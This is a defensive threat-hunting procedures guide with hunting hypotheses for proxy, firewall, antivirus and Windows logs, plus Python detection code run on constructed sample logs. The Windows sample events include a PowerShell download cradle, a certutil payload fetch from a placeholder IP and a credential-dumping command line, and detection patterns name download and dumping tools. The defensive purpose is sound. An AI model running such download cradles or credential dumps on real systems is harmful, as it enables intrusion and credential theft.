
Table of Contents
Intro to Hunting ............................................ 02
Threat Hunting Maturity Model ............................... 02
Basic Requirement for Threat Hunting ........................ 03
The Pyramid of Pain ......................................... 04
Importance of Threat Intelligence in Threat Hunting ......... 04
Process to Conduct Threat Hunting ........................... 05
Risk Rating Measurement Matrix .............................. 11

1|Page
Threat Hunting Procedures
1. Intro to Hunting – What It Is, Why It's Important
Threat hunting is a proactive, hypothesis-based investigation process for cyber-attacks: a
human-driven, proactive and iterative search through networks, endpoints, or datasets to detect
malicious, suspicious, or risky activities that have evaded detection by existing automated tools.
Threat hunting has been around for a while, but it has only recently become a focus of modern
enterprise Security Operation Centres (SOCs). Hunting can transform the threat detection efforts
of an organization.
The purpose of hunting is specifically to find what has escaped the automated alerting and
monitoring systems. Hunting means searching for anomalies by patrolling through the data, rather
than investigating an alert raised by the SIEM.
It is also important to keep in mind that successful hunting is tied to capabilities in three different
areas:

Figure 1: A Successful Threat-hunting technique

2. Threat Hunting Maturity Model


As mentioned, there are many kinds of techniques and practices that an analyst can pursue in hunting.
Hunting maturity is a measure of which kinds of techniques and data an analyst can work with. To help
assess current hunting capabilities and determine how analysts should aim to grow them, the Hunting
Maturity Model (HMM) is given below for reference.

(The Hunting Maturity Model is only a reference model; many organizations will be at varying levels
of capability, excelling at some criteria and less advanced in others.)

Figure 2: Threat-hunting maturity model

The Hunting Maturity Model describes five levels of an organization's proactive detection capability,
from HM0 (Initial) through HM1 (Minimal), HM2 (Procedural) and HM3 (Innovative) to HM4 (Leading).
Each level corresponds to how effectively an organization can hunt based on the data it collects,
its ability to follow and create data analysis procedures (DAP), and its level of hunting
automation. The HMM can be used by analysts and managers to measure current maturity and provide a
roadmap for improvement. Often these improvements focus on a combination of tools, processes, and
personnel.

3. Basic Requirement for Threat Hunting

Analytical Mindset: This is, without question, the most important skill an analyst can possess.
Without the innate curiosity in and pursuit of the “huh … that’s weird,” an analyst can have all the
data in the world, but they will inevitably find themselves missing pieces of the puzzle. The analyst
needs to be able to make reasoned assumptions and chart a new course when the trail runs cold.

Log Analysis: Logs from services and devices are among the most important and underutilized
sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot
between data sources to see the big picture is a key competency.

Network Forensics: The ability to read and understand packet capture data and determine whether
network traffic is malicious. If you are fortunate enough to extend your network security monitoring
(NSM) capabilities to the endpoint with an EDR product, a sound foundation in host-based forensics
complements your network knowledge.

Network Architecture: An understanding of different network devices and how they operate within
the environment.

Attacker Lifecycle: Understanding the different events that happen at any given stage in an attack
lifecycle will better prepare your analysts to compartmentalize and prioritize their findings and
activities.
Tools: This is an incredibly broad area, but at a foundational level an understanding of how log
aggregators ingest data, and of what packet capture analysis tools do, is essential for the
analyst.

OS Architecture: Different operating systems represent different attack vectors. A strong grasp of
Windows- and Linux-based operating systems is essential.

Attack Methods: Exploit Kits, Malware, Phishing, and software misconfigurations. Understanding
how an attacker attempts to penetrate your network is key to hunting for indicators of the behavior.

4. The Pyramid of Pain


The Pyramid of Pain is a simple diagram showing the relationship between the types of indicators
an analyst might use to detect an adversary's activity and how much pain it causes the adversary
when those indicators are detected and denied. Hash values and IP addresses sit at the bottom:
trivial for the attacker to change. Domain names and network/host artifacts sit in the middle.
Tools and TTPs sit at the top, where detection forces the adversary to re-tool or change behaviour.
Hunts built on the upper layers are therefore more durable than hunts keyed on atomic indicators.

Figure 3: Pyramid of Pain – Threat-hunting

5. Importance of Threat Intelligence in Threat Hunting


Threat Intelligence or Cyber Threat Intelligence (CTI) is the part of cybersecurity that focuses on the
collection and analysis of information on both potential and current cyber-attacks that threaten the
security of an organization or its assets. Cyber Threat Intelligence is a proactive security measure that
helps prevent data or security breaches and saves the financial cost of cleaning up after a breach.

CTI's main objective is to give companies an in-depth understanding of the cyber-threats that pose
the greatest risks to their infrastructure and of how to protect their business in the long run.

Cyber threat intelligence gathers raw information about new and existing threat actors from many
different sources. CTI teams then analyze the collected data to produce threat intelligence feeds and
reports containing only the most important information, which automated security controls and
management can use to make security decisions for the company. The fundamental purpose of this kind
of security is to keep companies informed of advanced threats and exploits.

6. Process to Conduct Threat Hunting

The threat hunting process starts with collecting logs from all sources, such as security
solutions, databases, servers and applications. The easiest and most effective way to collect the
logs is a log management platform such as a SIEM. After collecting and normalizing the logs, the
next step is to develop a hypothesis and apply it to the resulting data to start the hunt.

I. Gathering Data: Collect, Normalize, Analyse


The following are some of the types of logs that may be important to collect in the organization
environment:
• Configuration Management Database (CMDB)
• Application/service logs
    • DHCP
    • Proxy
    • Web and Application Server
    • Active Directory/LDAP
    • Domain Name Service (DNS)
    • Application Firewall
    • Database Application and Transaction
• Host-based logs
    • Host/Network IDS/IPS
    • Firewall
    • Antivirus
    • Operating System (e.g., Windows Event and UNIX Syslog)
    • Endpoint Detection Response (EDR)
    • Virtual Machine Hypervisor
• Network infrastructure logs
    • VPN
    • Router
    • Firewall
    • Load Balancer

The graphic below shows a data collection framework designed to help organizations focus on
discovering and qualifying security incidents and attacks.

Figure 4: Data Collection Framework

II. Development of a Hypothesis for Threat-hunting

After collecting, normalizing and analyzing the data, the next step is to develop a hypothesis
and apply it to the resulting data to start hunting. Below is a list of the sources that help in
developing advanced threat hunting hypotheses:

Internal Sources: internal sources are data generated within the boundary of an organisation,
such as past incidents, SIEM alerts and VA/PT reports. These data sources are very important and
helpful for a threat hunter building a hypothesis: a hypothesis built on internal data sources is
grounded in the organisation's own environment and is therefore realistic and effective. Below are
some examples of internal sources:

• Past incidents
• Reconnaissance attempts against your infrastructure
• Threats to specific line of business and industry verticals
• Threats to customers’ intellectual property
• VA/PT reports

External Sources: external sources for hypothesis development are data generated outside the
boundary of an organisation or published by other vendors, such as threat intel feeds, the TTPs of
an attack, OSINT, threat advisories and government advisories. Hypotheses built on external sources
are proactive hypotheses that run one step ahead of the monitoring system. Below are some examples
of external sources:

• Paid intelligence feeds
• Open Source Intelligence (OSINT)
• Partnerships with government agencies
• Security Advisories
• TTPs of an attack (e.g. the MITRE ATT&CK knowledge base)
• Cyber Kill Chain

Figure 5: MITRE ATT&CK Refresher
MITRE ATT&CK recent developments: https://attack.mitre.org/resources/updates/

III. List of Threat-hunting Hypotheses

Below is a list of some basic threat hunting hypotheses:

1. Proxy Logs Traffic Analysis Hypotheses

I. Hypothesis: Bytes uploaded stats/Data upload
Hunt For: Session uploaded data > 1 MB
Possible Threat: Data exfiltration
Format: Number of bytes, client IP, server IP, server port

II. Hypothesis: Bytes downloaded stats/File download
Hunt For: Session downloaded data > 3 MB
Possible Threat: Attacker downloading attack tools
Format: Number of bytes, client IP, server IP, server port
(The 1 MB and 3 MB thresholds are starting points; tune them to what is normal for the environment
or the hunt will drown in cloud-storage and software-update traffic.)

III. Hypothesis: HTTP host header/Traffic on malicious domains/URL categories
Hunt For: Hosts not ending with .com | .net | .org & host length > 30 characters
Possible Threat: DGA, suspicious domains (e.g. URL shorteners such as http://bit.ly/2jKNAhi, or
HTTP traffic to an IP address instead of an FQDN)
Format: Traffic Count, HTTP host, URL Categories
(The length/TLD filter is a coarse first cut: CDN and cloud-service hostnames are often long and
legitimate, so baseline against known-good traffic before escalating a hit.)

IV. Hypothesis: HTTP referrer header
Hunt For: Malicious referring domains
Possible Threat: Watering hole and JS exploit kits
Format: Count, HTTP referrer, HTTP status code (302)

V. Hypothesis: HTTP user-agent header
Hunt For: Uncommon or missing User-Agents
Possible Threat: Malicious traffic
Format: Count, HTTP user-agent, HTTP status code

VI. Hypothesis: HTTP request methods/Suspicious HTTP requests
Hunt For: Methods other than GET/POST
Possible Threat: Uploads (PUT method), tunnelling (CONNECT method) and injection
Format: Traffic count, HTTP method

VII. Hypothesis: HTTP number of requests/Beaconing on suspicious domains
Hunt For: Clients sending an increasing number of HTTP requests to the same destination,
especially at regular intervals
Possible Threat: Beacons, tunnelling, and data exfiltration
Format: Count of traffic, client IP, server IP, Domain name, HTTP status code
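The proxy hypotheses above, implemented as an added example (this code is not part of the original document): it parses constructed sample lines in a Squid-style space-separated layout and runs hunts I, II, III, V, VI and VII over them. The column order, the 1 MB/3 MB thresholds (taken as decimal megabytes), the User-Agent baseline and the sample addresses are all assumptions. The beaconing hunt goes beyond the text's "increasing number of requests": it measures the regularity of the gaps between one client's requests to one host, which is the classic beacon signature.

```python
"""Proxy-log hunts (added example on constructed data; not from the original document)."""
from collections import defaultdict
from datetime import datetime
import ipaddress
import statistics

MB = 1_000_000  # assumption: the "1 MB"/"3 MB" thresholds above are decimal megabytes
# Constructed sample log, Squid-style and space separated. Column order is an assumption:
# ts client_ip server_ip server_port method host user_agent referrer status bytes_up bytes_down
SAMPLE_PROXY_LOG = """\
2024-03-01T09:00:00 10.1.1.5 93.184.216.34 443 GET www.example.com Mozilla/5.0 - 200 512 20480
2024-03-01T09:00:05 10.1.1.5 93.184.216.34 443 POST upload.example.net Mozilla/5.0 - 200 2097152 300
2024-03-01T09:01:00 10.1.1.7 203.0.113.9 80 GET 203.0.113.9 curl/7.68.0 - 200 200 4194304
2024-03-01T09:01:30 10.1.1.9 198.51.100.22 80 GET xk3jf9q2lmz8vbn4t6yqw7e1r0p5a9.xyz Mozilla/5.0 - 404 100 100
2024-03-01T09:02:00 10.1.1.9 198.51.100.22 80 CONNECT evil.example.org - - 200 100 100
2024-03-01T09:03:00 10.1.1.12 198.51.100.50 443 GET c2.example.biz - - 200 90 90
2024-03-01T09:04:00 10.1.1.12 198.51.100.50 443 GET c2.example.biz - - 200 90 90
2024-03-01T09:05:00 10.1.1.12 198.51.100.50 443 GET c2.example.biz - - 200 90 90
2024-03-01T09:06:00 10.1.1.12 198.51.100.50 443 GET c2.example.biz - - 200 90 90
"""
FIELDS = ("ts", "client_ip", "server_ip", "server_port", "method", "host",
          "user_agent", "referrer", "status", "bytes_up", "bytes_down")
KNOWN_UA_PREFIXES = ("Mozilla/", "Microsoft")  # assumed baseline of expected User-Agents

def parse_proxy_log(text):
    """Normalise each line into a dict: ints for numeric fields, None for '-' placeholders."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue  # blank or malformed line: skip it rather than abort the hunt
        rec = dict(zip(FIELDS, parts))
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        for key in ("server_port", "status", "bytes_up", "bytes_down"):
            rec[key] = int(rec[key])
        for key in ("user_agent", "referrer"):
            rec[key] = None if rec[key] == "-" else rec[key]
        records.append(rec)
    return records

def hunt_large_uploads(records, threshold=1 * MB):
    """Hypothesis I: sessions that uploaded more than the threshold (possible exfiltration)."""
    return [(r["client_ip"], r["server_ip"], r["server_port"], r["bytes_up"])
            for r in records if r["bytes_up"] > threshold]

def hunt_large_downloads(records, threshold=3 * MB):
    """Hypothesis II: sessions that downloaded more than the threshold (attack tooling)."""
    return [(r["client_ip"], r["server_ip"], r["server_port"], r["bytes_down"])
            for r in records if r["bytes_down"] > threshold]

def hunt_suspicious_hosts(records, common_tlds=(".com", ".net", ".org"), max_len=30):
    """Hypothesis III: long hosts outside the common TLDs (DGA-like) or IP-literal hosts -> count."""
    counts = defaultdict(int)
    for r in records:
        host = r["host"].lower()
        try:
            ip_literal = bool(ipaddress.ip_address(host))
        except ValueError:
            ip_literal = False
        if ip_literal or (len(host) > max_len and not host.endswith(common_tlds)):
            counts[host] += 1
    return dict(counts)

def hunt_user_agents(records, known_prefixes=KNOWN_UA_PREFIXES):
    """Hypothesis V: missing or uncommon User-Agents. Returns (user_agent, status) -> count."""
    counts = defaultdict(int)
    for r in records:
        ua = r["user_agent"]
        if ua is None or not ua.startswith(known_prefixes):
            counts[(ua or "<none>", r["status"])] += 1
    return dict(counts)

def hunt_methods(records, expected=("GET", "POST")):
    """Hypothesis VI: methods other than GET/POST (PUT uploads, CONNECT tunnels) -> count."""
    counts = defaultdict(int)
    for r in records:
        if r["method"] not in expected:
            counts[r["method"]] += 1
    return dict(counts)

def hunt_beaconing(records, min_requests=4, max_cv=0.2):
    """Hypothesis VII, extended: one client hitting one host at a near-constant interval. Regularity
    is the coefficient of variation (stdev/mean) of the gaps; near zero is the classic beacon shape.
    Returns (client, server, host, request_count, mean_gap_seconds)."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client_ip"], r["server_ip"], r["host"])].append(r["ts"])
    hits = []
    for key, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0  # guard against identical timestamps
        if cv <= max_cv:
            hits.append((*key, len(stamps), round(mean, 1)))
    return hits
```

Each hunt returns a structure matching the "Format" line of its hypothesis, so the same functions can be pointed at a real export once the FIELDS tuple is adjusted to the proxy's column order. Run `parse_proxy_log(SAMPLE_PROXY_LOG)` and pass the result to each hunt; on the sample, the 2 MB POST, the 4 MB download from an IP-literal host, the 34-character .xyz host, the curl and missing User-Agents, the CONNECT and the four 60-second-spaced requests to c2.example.biz are the hits.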

2. Firewall Traffic Analysis Hypotheses

I. Hypothesis: SSH sessions
Hunt For: Unexpected connections
Possible Threat: Recon and lateral movement
Format: Count of traffic, client IP, server IP, server port

II. Hypothesis: RDP sessions/Unauthorized remote desktop connections
Hunt For: Unexpected RDP clients/servers
Possible Threat: Lateral movement
Format: Count of traffic, client IP, server IP, server port

III. Hypothesis: IRC sessions/Suspicious malware communication
Hunt For: IRC clients
Possible Threat: C&C traffic and potential insider
Format: Count of traffic, client IP, server IP, server port

IV. Hypothesis: FTP sessions/Data exfiltration
Hunt For: Unexpected FTP clients/servers
Possible Threat: Lateral movement or data exfiltration
Format: Count of traffic, client IP, server IP, server port

V. Hypothesis: TCP listening ports on private IPs/Inbound traffic on critical ports
Hunt For: Unauthorized services
Possible Threat: Backdoors
Format: Count of sessions, TCP port, server IP, protocol

VI. Hypothesis: TCP listening ports on public IPs/Outbound connections to suspicious IPs
Hunt For: Abnormal port/protocol combinations (e.g. non-HTTP carried over port 80)
Possible Threat: Unauthorized communication channel
Format: Count of sessions, TCP port, protocol
("Unexpected" only has meaning against a baseline: which jump hosts and admin subnets may open
SSH/RDP/FTP, and which server/port pairs are registered in the CMDB. Build that list before the
hunt, and use the firewall's application identification rather than the port alone for VI.)
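The firewall hypotheses above, as an added example that is not part of the original document: it runs hunts I to VI over constructed sessions from an application-aware firewall. The column layout, the organisation's 10.0.0.0/8 address space, the jump host 10.1.1.5 as the only authorised remote-admin client, the expected port-to-application mapping and the listener baseline are assumptions standing in for the organisation's CMDB.

```python
"""Firewall-log hunts (added example on constructed data; not from the original document)."""
from collections import defaultdict
import ipaddress

# Constructed sample of allowed sessions from an application-aware firewall. Column order,
# addresses and the app labels are assumptions; '#' comments are for the reader only.
SAMPLE_FIREWALL_LOG = """\
2024-03-01T10:00:00 10.1.1.5 10.1.2.20 22 tcp ssh allow          # jump host: expected
2024-03-01T10:00:10 10.1.1.40 10.1.2.20 22 tcp ssh allow         # workstation -> server SSH
2024-03-01T10:00:20 10.1.1.40 10.1.2.20 22 tcp ssh allow
2024-03-01T10:01:00 10.1.1.40 10.1.2.21 3389 tcp rdp allow       # workstation -> server RDP
2024-03-01T10:02:00 10.1.1.41 198.51.100.7 6667 tcp irc allow    # outbound IRC
2024-03-01T10:03:00 10.1.1.42 198.51.100.8 80 tcp ssh allow      # SSH carried over port 80
2024-03-01T10:04:00 198.51.100.9 10.1.2.22 4444 tcp unknown allow  # inbound to unregistered port
2024-03-01T10:05:00 10.1.1.5 10.1.2.22 443 tcp ssl allow
2024-03-01T10:06:00 10.1.1.43 10.1.2.23 21 tcp ftp allow         # workstation -> server FTP
"""
FIELDS = ("ts", "src_ip", "dst_ip", "dst_port", "proto", "app", "action")
REMOTE_SERVICES = {"ssh", "rdp", "ftp", "irc"}            # hypotheses I-IV
AUTHORISED_REMOTE_CLIENTS = {"10.1.1.5"}                 # assumed jump host
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]     # assumed organisation address space
EXPECTED_APP_ON_PORT = {22: "ssh", 21: "ftp", 53: "dns", 80: "http", 443: "ssl", 3389: "rdp"}
APPROVED_LISTENERS = {("10.1.2.20", 22), ("10.1.2.21", 3389), ("10.1.2.22", 443), ("10.1.2.23", 21)}

def parse_firewall_log(text):
    """Normalise each line into a dict; comments and malformed lines are dropped."""
    records = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["dst_port"] = int(rec["dst_port"])
        rec["app"] = rec["app"].lower()
        records.append(rec)
    return records

def is_internal(ip):
    """True if the address falls inside the organisation's own ranges (not Python's is_private,
    which also treats the documentation ranges used in the sample as private)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def hunt_remote_sessions(records, authorised=AUTHORISED_REMOTE_CLIENTS):
    """Hypotheses I-IV: SSH/RDP/FTP/IRC sessions from clients not authorised for them. IRC has no
    legitimate client here, so every IRC session is returned. Returns (service, client, server,
    port) -> session count."""
    counts = defaultdict(int)
    for r in records:
        app = r["app"]
        if app not in REMOTE_SERVICES or (app != "irc" and r["src_ip"] in authorised):
            continue
        counts[(app, r["src_ip"], r["dst_ip"], r["dst_port"])] += 1
    return dict(counts)

def hunt_port_app_mismatch(records, expected=EXPECTED_APP_ON_PORT):
    """Hypothesis VI: the application identified on a port is not what that port should carry
    (e.g. SSH over 80). Returns (port, app) -> session count."""
    counts = defaultdict(int)
    for r in records:
        want = expected.get(r["dst_port"])
        if want and r["app"] != want:
            counts[(r["dst_port"], r["app"])] += 1
    return dict(counts)

def hunt_unapproved_listeners(records, approved=APPROVED_LISTENERS):
    """Hypothesis V: allowed sessions to an internal server on an (ip, port) pair absent from the
    service baseline; a listener nobody registered is a candidate backdoor.
    Returns (port, server, proto) -> session count."""
    counts = defaultdict(int)
    for r in records:
        if r["action"] != "allow" or not is_internal(r["dst_ip"]):
            continue
        if (r["dst_ip"], r["dst_port"]) not in approved:
            counts[(r["dst_port"], r["dst_ip"], r["proto"])] += 1
    return dict(counts)

if __name__ == "__main__":
    recs = parse_firewall_log(SAMPLE_FIREWALL_LOG)
    print("remote sessions     :", hunt_remote_sessions(recs))
    print("port/app mismatch   :", hunt_port_app_mismatch(recs))
    print("unapproved listeners:", hunt_unapproved_listeners(recs))
```

The counts are keyed exactly as the "Format" lines above ask for, so a hit can be pasted straight into a case. Note the deliberate choice to test internal ranges against an explicit list rather than `ipaddress`'s `is_private`: that property also returns True for the 198.51.100.0/24 and 203.0.113.0/24 documentation ranges, which would have turned the outbound IRC and SSH-over-80 sessions in the sample into false "unapproved listener" hits.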

3. Antivirus Log Analysis Hypotheses

I. Hypothesis: Recurring malware infection on a system
Hunt For: Recurring infection/malware reinfection
Possible Threat:
Format: Virus name, infected file, file hash value, count of infections

II. Hypothesis: Uncleaned malware infection
Hunt For: Uncleaned malware
Possible Threat: New malware/ransomware without a signature
Format: Action taken, virus name, infected file, file hash value, count of infections

4. Windows Log Analysis Hypotheses

I. Hypothesis: Detailed Tracking events/Process creation
Hunt For: Suspicious processes created by an attacker/malware
Possible Threat: APT, new malware
Format: Event ID 4688, 4689, New Process Name, Creator Process Name, Logon ID, Account Name
(4688 records the command line only if "Include command line in process creation events" is
enabled in audit policy; without it most of the process hunts in the next section have nothing
to match on.)

II. Hypothesis: User added to a privileged group
Hunt For: APT expansion/privilege escalation
Possible Threat: APT attack
Format: Event ID 4732, 4728, 4756, 4746, 4751, 4761, Account Name, Logon ID

III. Hypothesis: Detection of Mimikatz
Hunt For: Credential dumps
Possible Threat: APT attack
Format: Event ID 4688, 4689, event data image: lsass.exe, mimikatz.exe
(Matching on the image name mimikatz.exe only catches an unrenamed binary. Also hunt the command
line for module names such as sekurlsa:: and lsadump::, and, where Sysmon is deployed, event ID 10
for processes opening a handle to lsass.exe.)

5. Other Hunting Hypotheses

• Hunt for File-less Malware
• Hunt for Malware
• Hunt for Lateral Movement
• Hunt for Windows Event IDs
• Hunt for group policy violations
• Hunt for Network Beaconing
• Hunt for Insider Privilege Escalation
• Hunt for Privilege failures
• Hunt for PowerShell Errors
• Hunt for PowerShell Traces
• Hunt for Login Failures on Critical Servers
• Hunt for vulnerabilities
• Hunt for Persistent Threats
• Hunt for Registry violations
• Hunt for Network traffic denied by firewalls or IPS
• Hunt for Unusual DNS requests, either to malicious domains or revealing internal flaws
• Hunt for Signs of DDoS activity and geographic irregularities
• Hunt for Mismatched port-application traffic
• Hunt for Unusual north-south or east-west network traffic
• Hunt for Anomalies
• Hunt for Unknown Network Shares
• Hunt for Network Recon tools
• Hunt for brute-force RDP attempts
• Hunt for Suspicious File Types
• Hunt for Windows Admin Shares
• Hunt for RDP, PsExec, task creation, scheduled tasks, WMI and service creation
• Hunt for Parent/Child relationships - Process
• Hunt for Parent/Child relationships - MS Office
• Hunt for Parent/Child relationships - Cmd
• Hunt for Parent/Child relationships - PowerShell
• Hunt for Parent/Child relationships - Memory
• Hunt for Process Injection
• Hunt for Windows one-liners that download a remote payload; possible tools: powershell.exe,
  wmic.exe, regsvr32.exe, rundll32.exe, mshta.exe, regasm.exe, regsvcs.exe, odbcconf.exe,
  msbuild.exe, certutil.exe, bitsadmin.exe
• Hunt for Masquerading
• Hunt for Privilege Escalation - Access token manipulation
• Hunt for Privilege Escalation - Weak service permissions
• Hunt for UAC Bypass
• Hunt for Credential Dumping
• Hunt for Credential Dumping - Dumping the SAM/SECURITY registry hives
• Hunt for Credential Dumping - Shadow Copies
• Hunt for Mimikatz commands / DCShadow
• Hunt for Credential Dumping - LSASS memory access
• Hunt for Suspicious Services: services that run executables from unusual paths (e.g. outside
  %systemroot%\System32, or from user-writable directories)
• Hunt for Suspicious Services: services that run PowerShell
• Hunt for Beaconing
• Hunt for Bot Activity
• Hunt for Malicious Domains & DNS Tunnelling
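The Windows hunts in section 4 and the parent/child, LOLBin one-liner, privileged-group and credential-dumping items in the list above, served by one added example that is not part of the original document. It runs over constructed events in the flat field layout a SIEM produces from Security-log 4688/4728/4732 records and Sysmon event 10; hostnames, users, paths, the Office/shell sets and the lsass reader allowlist are assumptions. The fourth sample event is a renamed credential-dumping tool: its image name would never match mimikatz.exe, which is why the hunt keys on module names in the command line and on Sysmon's lsass access event instead.

```python
"""Windows event-log hunts (added example on constructed events; not from the original document)."""
import ntpath
import re

# Constructed events in the flat field layout a SIEM produces from EVTX/XML. Hosts, users and
# paths are assumptions. 4688 carries CommandLine only when command-line auditing is enabled.
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                    '.DownloadString(\'http://203.0.113.5/a.ps1\')"'},
    {"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/x.exe C:\Users\Public\x.exe"},
    {"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"Channel": "Security", "EventID": 4688, "Computer": "SRV01", "SubjectUserName": "svc_backup",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Users\Public\update.exe",  # renamed tool: the image name alone misses it
     "CommandLine": 'update.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Channel": "Security", "EventID": 4732, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "TargetUserName": "Administrators", "MemberName": "CORP\\bob"},
    {"Channel": "Security", "EventID": 4728, "Computer": "DC01", "SubjectUserName": "helpdesk",
     "TargetUserName": "Sales-Users", "MemberName": "CORP\\carol"},
    {"Channel": SYSMON, "EventID": 10, "Computer": "SRV01", "GrantedAccess": "0x1010",
     "SourceImage": r"C:\Users\Public\update.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"Channel": SYSMON, "EventID": 10, "Computer": "SRV01", "GrantedAccess": "0x1000",
     "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
]
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBIN_RE = re.compile(r"\b(powershell|wmic|regsvr32|rundll32|mshta|regasm|regsvcs|odbcconf|msbuild"
                       r"|certutil|bitsadmin)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|-urlcache|/transfer"
                         r"|https?://)", re.IGNORECASE)
GROUP_ADD_EVENTS = {4728, 4732, 4756, 4746, 4751, 4761}
PRIVILEGED_GROUPS = {"administrators", "domain admins", "enterprise admins", "schema admins",
                     "backup operators", "remote desktop users"}
MIMIKATZ_RE = re.compile(r"(mimikatz|sekurlsa::|lsadump::|privilege::debug)", re.IGNORECASE)
LSASS_READERS = {"svchost.exe", "csrss.exe", "wininit.exe", "msmpeng.exe"}  # assumed allowlist

def base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path or "").lower()

def hunt_office_spawning_shells(events):
    """Parent/child - MS Office: an Office binary spawning a shell or script host (4688)."""
    return [(e["Computer"], base(e["ParentProcessName"]), base(e["NewProcessName"]))
            for e in events if e["EventID"] == 4688
            and base(e["ParentProcessName"]) in OFFICE and base(e["NewProcessName"]) in SHELLS]

def hunt_download_oneliners(events):
    """LOLBin one-liners fetching a remote payload: a listed binary in the image name or the
    command line, together with a download verb or a URL."""
    hits = []
    for e in events:
        if e["EventID"] != 4688:
            continue
        text = base(e["NewProcessName"]) + " " + e.get("CommandLine", "")
        if LOLBIN_RE.search(text) and DOWNLOAD_RE.search(text):
            hits.append((e["Computer"], e["SubjectUserName"], base(e["NewProcessName"])))
    return hits

def hunt_privileged_group_adds(events):
    """User added to a privileged group (4728/4732/4756 and the security-disabled variants)."""
    return [(e["EventID"], e["TargetUserName"], e["MemberName"], e["SubjectUserName"])
            for e in events if e["EventID"] in GROUP_ADD_EVENTS
            and e["TargetUserName"].lower() in PRIVILEGED_GROUPS]

def hunt_credential_dumping(events):
    """Mimikatz-style activity: module names or the tool name in a 4688 image/command line, plus
    Sysmon event 10 where a process outside the allowlist opens a handle to lsass.exe."""
    hits = []
    for e in events:
        if e["EventID"] == 4688:
            text = base(e["NewProcessName"]) + " " + e.get("CommandLine", "")
            if MIMIKATZ_RE.search(text):
                hits.append(("4688", e["Computer"], base(e["NewProcessName"])))
        elif e["EventID"] == 10 and e.get("Channel") == SYSMON:
            if base(e["TargetImage"]) == "lsass.exe" and base(e["SourceImage"]) not in LSASS_READERS:
                hits.append(("sysmon10", e["Computer"], base(e["SourceImage"])))
    return hits
```

On the sample, `hunt_office_spawning_shells` flags WINWORD.EXE launching cmd.exe, `hunt_download_oneliners` flags both the PowerShell DownloadString cradle and the certutil -urlcache fetch, `hunt_privileged_group_adds` flags the 4732 add to Administrators but not the 4728 add to an ordinary group, and `hunt_credential_dumping` flags update.exe twice: once for the sekurlsa:: module in its command line and once for its Sysmon event 10 handle to lsass.exe, while the allowlisted svchost.exe access is ignored. The lsass allowlist is the piece that needs the most local tuning; EDR agents and backup software legitimately open lsass and should be added before the hunt is run at scale.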

7. Risk Rating Measurement Matrix

HIGH
This rating is reserved for threats that will result in an impact to the organization.
A threat is categorized as HIGH if:

• it involves critical organization assets
• it attempts to evade standard signature-based detections
• it exfiltrates data outside the organization
• it attempts to create a communication link with external Command & Control
• it results in direct reputational or financial loss for the organization

MEDIUM
A threat is categorized as MEDIUM if:

• it involves limited infections at endpoints
• malware on a system cannot be cleaned/deleted/quarantined
• it attempts to connect externally but the connection is blocked
• it involves access to suspicious domains or IP addresses

LOW
A threat is categorized as LOW if:

• it involves attempted attacks from external sources
• it relates to security misconfiguration in systems
• it involves access to non-standard or non-business domains or IP addresses
• it involves installation of unnecessary applications (not necessarily malicious)

Prepared By:
-Vishal Kumar
Threat Analyst

